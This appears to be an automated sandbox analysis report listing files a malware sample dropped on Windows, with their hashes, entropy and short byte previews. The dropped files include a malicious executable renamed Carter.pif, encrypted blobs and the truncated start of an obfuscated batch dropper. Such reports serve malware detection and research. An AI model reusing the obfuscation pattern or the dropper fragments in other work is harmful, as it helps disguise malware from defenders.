                                                                      Preview:PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Temp\220239\Carter.pif

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.62028134425878
                                                                      Encrypted:false
                                                                      SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                      SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                      SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                      SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Joe Sandbox View:
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                      • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                      • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\220239\F

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):257339
                                                                      Entropy (8bit):7.999363363076799
                                                                      Encrypted:true
                                                                      SSDEEP:6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
                                                                      MD5:606D3FBBD2B3F54B73E2B049EBC1CB66
                                                                      SHA1:E3D039B3F84158DBC882D62614AEC3A66766509F
                                                                      SHA-256:4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
                                                                      SHA-512:35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
                                                                      Malicious:false
                                                                      Preview:>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V......*.U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5*l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W..*..u..*.a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-|Cdg.L.........J.8{| ..5...-.h....!.... f.W..p.^...*.&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...*b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

                                                                      C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):65440
                                                                      Entropy (8bit):6.049806962480652
                                                                      Encrypted:false
                                                                      SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                      MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                      SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                      SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                      SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                                                      C:\Users\user\AppData\Local\Temp\Automatic

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):89403
                                                                      Entropy (8bit):7.99813128639969
                                                                      Encrypted:true
                                                                      SSDEEP:1536:WvzNmlhJS1NqPa2dvcaUjV1a8lW12m0tJURtrJFubAca7D87sxHf:Wv8iNCDcS8kQsz2bAcaE7sxHf
                                                                      MD5:3FF8403A4564EE7F0732F6A1ECEB194C
                                                                      SHA1:C9EFFAC660CDD5B789928EB9C1AFF4A79F2EAED6
                                                                      SHA-256:7EADEF0349D3391EAAA4931B910A12239F118AF38FFEBF5C54C68BDC5CEAAA3E
                                                                      SHA-512:8859C01D4CC10D0F09FD86F56B30E38073C973397775741BCEEC26F3F12423E22BA3B765C234D42A5DF705021AFA8DE2EF50E90F9E01931060A94ECEE1CEE698
                                                                      Malicious:false
                                                                      Preview:..o*...>........0%........]Z7EK.K(.I....Y...(..cJ.ls....r. .eD...G.A.K.t.......b.H.,|..1.|k..T.-.-..{uF....[h....e...OA+....8:.{.H....y.....a.T...A%m..z..]2.l....j./..=.b....x..FT..h1})...s.....G..e...h...*.o.GQk..].6..k:...H...H...q...Y.+^.#....&JG{x7Lz....o...8O..j.G/.Z4..2q=..9.0.Y3.6B@.]^.>.F.@1..v..GK.R..8-(.0(z..`B...aO....6E....1.po.B.-&.h.:.:....L..!N..=.1....n.i...~..17<........r.`.W.Q..A.=.?....Q^....*A.!...h.._......Jw.......Eh*GR0..Ki:U.4...".....o..l.VoZ.....Rv.lz...... .(..2v.t..q.B..!g.S..._...*.x.~,o.8..*@M.........C.q.oY...V...R.........S..4..r4...g.u.vy[.js....5[l6p.....F.^..Au.....N..my.)y.......]._....22.V|..N..i.......=.%<.Z..D.Q.u..d.[wdz^7.}.{....n,.......j........_i..oXl...#...J!...\..c..Q..p.=.PN.|.Y...1..<...g.e.......0..3..u..tP=8....bA...w...@].$...'?......*....V.J.ko..f"...o..[]F...V..$..6......A=..t.v.W.........zub..d.y>X9/.<0.........Oi.u..Y.S.W..L2...$.A.}....x....2../F....R.1.:7"\|GU.v.'.;.

                                                                      C:\Users\user\AppData\Local\Temp\Fires

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):89088
                                                                      Entropy (8bit):7.99803755231603
                                                                      Encrypted:true
                                                                      SSDEEP:1536:4HUCJTibUP87NmFlHoTTX91f9FjcCKxMxdcAwPPLDAdd+DgEbGOHNN+d6n3hlcFD:SWbv8F94f1Fjc6x4Tmd+DeOtN+dURlav
                                                                      MD5:DC54D0D4B55783075A2501B87D0C8D31
                                                                      SHA1:FEF29A787871C091260C34301D451BE56601CF53
                                                                      SHA-256:EFEC3D913AAF25D26D8EC4652340E132A0739B319DB62B12D2332461A2544777
                                                                      SHA-512:EABDCFE474DB5B0EA0CC5AE6D3E0CA11B2D785F2C47E1716983E7196CBDE306B69111123C602C40CCABF72481694D7C32E8FE61AE2C38581D04F768A869839CE
                                                                      Malicious:false
                                                                      Preview:.ke..)....-}f..-...._.....5..'......&.4X...I../...<.....l..4@B..."..J.).FJ.v:^....%.././....+.9..5}....\l.jS..3...ev.B...%...S.S...cG.=j.I).i..\..*.... .2.q<..v+..N.B.^.%.r.k..4...*7....pB..G.B7.Y.................-t.e.(.Q...C5....j.h}.n.....Z..........zE.~..I.t....XY...b..P|......\..3..hc].......)..k.....[_.J.g&\..3..a..h....w...h...J...e.n.sg,.j..r...N..K{..._1..by..2]j.Z.cb.D....D.b...9.t..D.M.2-...%.L~$6..aZ.Z.h't.*.|....i.Z...&..(...Z.....f...P..f.?.[......D....l.......v|..e...,......?...+.jvG..)...Z.Trx...H.{.......v..f.0.Mc..e'k.....1..@..k.Jvj..H..v.U'J@..U.].Z..P>Pp..<.+.X8B.R.....,%.y..k..._(.HG..|..%.CaI......P.....nN..&F.hH...+....|P.h..)$"Em.(-./..+.....!.........BI$'.........x....b...o.b.v......._.....#.j.."[. ..b..h......j..*MH.".a^.q...fF.HB*.w..)D.......Ms:.a...h.....QL.~3..v8....[..*C.....GA..jo...,..Z..m....Z`.W2.<..N....L..w.e.uoV9..d..E..C.d8...C...?....e....M9P.x2.Gt.yv.6..e.~.?@j....L^A*Z....L.Y..C..e....0...]@....qZ".

                                                                      C:\Users\user\AppData\Local\Temp\MSIa0f8c.LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):246
                                                                      Entropy (8bit):3.5197430193686525
                                                                      Encrypted:false
                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8+Da7:Qw946cPbiOxDlbYnuRK4
                                                                      MD5:6020096409DE2429E59A2A6570F67EF0
                                                                      SHA1:041790118BD8A685C0ADFB5271B10D0281660528
                                                                      SHA-256:F8E3748FAC8DE69E8A2356CEFF153070F3557417EAF13DB4202A24BFF16D4ED4
                                                                      SHA-512:A3CD3A0CBB9BA954262E4779214B69D0C878FC9A48516AFB3C23D1BEE28E66CE89FC95849EE96012093F3C65F21457FDBD447D52975061458B12DB9C30FCFB7C
                                                                      Malicious:false
                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.5./.1.2./.2.0.2.4. . .1.9.:.3.3.:.1.4. .=.=.=.....

                                                                      C:\Users\user\AppData\Local\Temp\Missouri

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):885684
                                                                      Entropy (8bit):6.621979600120346
                                                                      Encrypted:false
                                                                      SSDEEP:12288:UV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:uxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:B52BB2B76BB34CE2AD510641DB438931
                                                                      SHA1:316D724878B112E97A432EC85D10A993BF073274
                                                                      SHA-256:0AE073B61844F6F34FA87101DC67487FE4256547A5633D8362BBE659B3CBBFED
                                                                      SHA-512:06A3DF9F4910E6C45A074368F3182A37CFC1DE91C749FDBF9C874FB23A555EDB1425534B62E63B23823744A7DF89A677A0455C08563B10F5F74F155014865702
                                                                      Malicious:false
                                                                      Preview:..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I..........Vj.P....I..E$.G..E..G<.E .G@.E.P.7..4.I..E.+E.GD.E.+E.j.j..GH....I.Pj0.7....I.j.W..wL..\....=.wL..u.h..@.j(j.j.....I...wL....wL...wL.j..5.xL..G................_^[..]. .3........."......'....M..P....M..R...U..}..W..wL.........xL....t{..xL.3.V....0...M.8V:t..V:9............}.........t...td...t....tQ...tC~)....1.~8.uVWQ....I....t....t..u..#0...F8.3.@^_]...3........}......F8.....

                                                                      C:\Users\user\AppData\Local\Temp\Phpbb

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:ASCII text, with very long lines (449), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9301
                                                                      Entropy (8bit):5.189766528618456
                                                                      Encrypted:false
                                                                      SSDEEP:192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
                                                                      MD5:3D5A3A147ED08ACC8A92B1B79225B16C
                                                                      SHA1:E9E24609206C346DF77B7E49E48838604765339D
                                                                      SHA-256:D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
                                                                      SHA-512:8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
                                                                      Malicious:false
                                                                      Preview:Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie

                                                                      C:\Users\user\AppData\Local\Temp\Phpbb.bat

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:ASCII text, with very long lines (449), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9301
                                                                      Entropy (8bit):5.189766528618456
                                                                      Encrypted:false
                                                                      SSDEEP:192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
                                                                      MD5:3D5A3A147ED08ACC8A92B1B79225B16C
                                                                      SHA1:E9E24609206C346DF77B7E49E48838604765339D
                                                                      SHA-256:D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
                                                                      SHA-512:8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
                                                                      Malicious:false
                                                                      Preview:Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie

                                                                      C:\Users\user\AppData\Local\Temp\Response

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):78848
                                                                      Entropy (8bit):7.997642474583827
                                                                      Encrypted:true
                                                                      SSDEEP:1536:C8rW6c7wZq1wCXK1yDWHgpipHZAGuQetnB3vzrCtvPCoj2fQCyqMsgkE:dK7wZdCX3zopyyet1fmvPCToq8
                                                                      MD5:1C2CD5510A8B8BE255D26B74FBFC61EF
                                                                      SHA1:8DD84BE3314E46C2A41BFBD2D9873859D3F88B54
                                                                      SHA-256:8F7445D8F645AF42CC36F82642DF091756CF5DF22C5E32E695C5EB999194B0E5
                                                                      SHA-512:E0CE8FDB77E40CB073A0FEEDDCBCFF075439F601224374445E578B4BC02AC01B3A114E0612D7A6D90214F1D4AC2ACFE380DF4E8DBD3E428A8D9496E39C4F22A7
                                                                      Malicious:false
                                                                      Preview:>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V......*.U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5*l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W..*..u..*.a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-|Cdg.L.........J.8{| ..5...-.h....!.... f.W..p.^...*.&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...*b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

                                                                      C:\Users\user\AppData\Local\Temp\Statistical

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):7938
                                                                      Entropy (8bit):6.234825901896176
                                                                      Encrypted:false
                                                                      SSDEEP:192:BHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3ygxn:BHAHhww+/2nlP3r1WAL3yQn
                                                                      MD5:E65ADD0B46D5C8C0DEC008C11CBD71A5
                                                                      SHA1:894028D96A4649AC5403F3CE0FAF0C686AED4E32
                                                                      SHA-256:17610DA19952CEA20324EA64C7D6A8F27F21C639845F1C14B21194A0F5C2EA99
                                                                      SHA-512:B5FF13313576084EE8B0631F4F7D2518186165D25F7AB3DF7273A8CEF2D47E1DF322602A36441A4072A94B1F5E55D75DC5706CF92DBCAAD72B29B9E397BE6649
                                                                      Malicious:false
                                                                      Preview:DimPieLilHot..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1u31uuoj.ys2.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zopnoel.mme.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x245amm.ckp.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0fnenh2.2oz.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oh14npr4.i0p.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeci3uuo.135.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
